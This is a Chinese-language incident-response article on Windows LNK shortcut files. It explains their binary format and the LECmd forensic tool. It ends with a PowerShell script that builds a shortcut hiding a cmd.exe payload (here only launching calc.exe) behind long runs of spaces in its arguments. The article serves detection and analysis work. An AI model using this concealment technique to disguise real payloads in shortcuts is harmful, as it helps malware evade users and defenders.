长亭百川云 - 文章详情

应急响应之Lnk文件分析

huasec

83

2024-07-13

“ 

LNK是MicrosoftWindows用于指向可执行文件或应用程序的快捷方式文件的扩展名。LNK文件通常用于创建开始菜单和桌面快捷方式。“LNK”是“Link”的缩写,“.lnk”后缀即使勾选显示已知后缀名也会自动隐藏,而且该文件可以通过更改图标来伪装成合法文档。本文介绍LNK文件的Shell LinkBinary文件格式,并分析如何检测恶意的快捷方式 (LNK)。

01

Shell Link Binary

Shell Link Binary包含用于访问另一个数据对象的信息,文件扩展名为“.LNK”。目的是通过另一个对象访问数据对象,其存储了对目标数据对象的某种形式的引用。Shell link Binary由以下五部分组成:

SHELL_LINK_HEADER包含有关目标文件的关键信息、与该文件相关的属性以及其他结构,例如LinkFlags,用于标识其他可选标头(结构)的存在。例如,要使 LINKTARGET_IDLIST 结构存在,必须在LinkFlags 子结构中设置HasLinkTargetIDList属性。

**LINKTARGET_IDLIST,**如果在LinkFlags下设置HasLinkTargetIDList,LINKTARGET_IDLIST存储对文件系统上目标位置的引用,但该引用不是文件绝对路径(C:\test\1.txt),相反使用的是Windows Shell NameSpace,通过IShellFolder接口定位文件夹,每个文件夹或者文件都维护自己的ItemIDList,里面记录了它们的所有属性,比如文件名、类型、大小、修改时间。该IDList进一步封装在LinkTargetIdList结构中。

**LinkInfo,**如果在LinkFlags结构体中设置了HasLinkInfo,则会填充LinkInfo结构体,包含用于解析链接目标和标识其位置的信息,例如驱动器卷、序列号、标签和本地路径。

**StringData,**StringData部分主要由ShellLinkHeader中的LinkFlags结构控制,例如如果在LinkFlags中设置了HasWorkingDir和HasRelativePath属性,就能够在这个结构中看到链接目标的工作目录和相对路径。另一个重要的属性是HasArguments,它指定要执行链接的命令行参数。

ExtraData包含关于Lnk文件的所有补充信息。例如:

EnvironmentVariableDataBlock结构体可以查看Lnk文件的环境变量,

TrackerDataBlock可以帮助识别目标文件是否被复制或移动,还可以返回目标最后存在的MachineID(NetBIOS名称)和MAC地址等信息。

更多信息参见

https://docs.microsoft.com/zh-cn/openspecs/windows\_protocols/ms-shllink/747629b3-b5be-452a-8101-b9a2ec49978c

02

LEcmd

下载地址:https://github.com/EricZimmerman/LECmd

使用方法:

>LECmd.exe -f"C:\Users\Public\Desktop\Wireshark.lnk"

字段介绍:

Tracker database block 包含了攻击者机器的物理信息:

  Machine ID: desktop-0u9o925

  MAC Address: 00:0c:29:0d:92:4b

  MAC Vendor: VMWARE

  Creation: 2021-01-28 03:28:55

针对恶意的LNK类型文件,可以给我们提供LNK滥用方式,创建LNK的主机信息(如MAC,磁盘串号,主机名)等信息,这些信息对于样本溯源和提取同源样本来说十分有用。

03

构造恶意Lnk文件分析

一般情况下,攻击者会使用Lnk文件的命令行来实现一些恶意操作,例如:点击Lnk文件打开计算器

`$file = Get-Content "C:\Users\admin\Desktop\test.txt"``$blank_space = '      '``$WshShell = New-Object -comObject WScript.Shell``$Shortcut = $WshShell.CreateShortcut("C:\Users\admin\Desktop\test.lnk")``$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"``$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,22"``$Shortcut.Arguments = $blank_space + $file``$Shortcut.Save()`

注:通过修改$blank_space的空格数量可以实现隐藏payload参数

C:\Users\admin\Desktop\test.txt文件中写入/c start calc.exe

执行命令后生成的test.lnk文件格式如图,260个空格字符后面接着为payload代码

查看文件参数,显示如图,均被空格字符填充,payload成功隐藏

运行test.lnk,弹出计算器,payload成功执行。

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2